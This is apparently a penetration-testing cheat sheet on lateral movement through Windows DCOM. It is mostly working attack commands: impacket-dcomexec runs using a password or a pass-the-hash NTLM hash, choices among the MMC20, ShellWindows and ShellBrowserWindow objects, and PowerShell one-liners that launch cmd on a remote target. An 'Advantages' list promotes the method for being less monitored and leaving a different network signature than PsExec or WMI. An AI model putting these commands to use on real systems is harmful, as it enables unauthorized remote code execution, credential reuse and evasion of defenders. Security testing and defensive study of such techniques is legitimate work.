Skip to main content

Overview

DCOM (Distributed Component Object Model) allows remote COM object interaction. Several COM objects support command execution. Uses port 135 + dynamic high ports.

Impacket — dcomexec

impacket-dcomexec DOMAIN/user:password@TARGET
impacket-dcomexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-dcomexec DOMAIN/user:password@TARGET "whoami"

Specify Object

impacket-dcomexec -object MMC20 DOMAIN/user:password@TARGET
impacket-dcomexec -object ShellWindows DOMAIN/user:password@TARGET
impacket-dcomexec -object ShellBrowserWindow DOMAIN/user:password@TARGET

PowerShell — MMC20.Application

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd", $null, "/c whoami > C:\temp\out.txt", "7")

PowerShell — ShellWindows

$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "TARGET"))
$com.item().Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\temp\out.txt", "C:\Windows\System32", $null, 0)

Advantages

  • Less monitored than SMB-based tools
  • No service creation
  • No binary upload
  • Different network signature than PsExec/WMI

Requirements

  • Admin rights on target
  • RPC (135) + dynamic high ports accessible
  • DCOM enabled on target

Quick Reference

TaskCommand
Shellimpacket-dcomexec DOMAIN/user:pass@TARGET
PtHimpacket-dcomexec DOMAIN/user@TARGET -hashes :HASH
MMC20-object MMC20
ShellWindows-object ShellWindows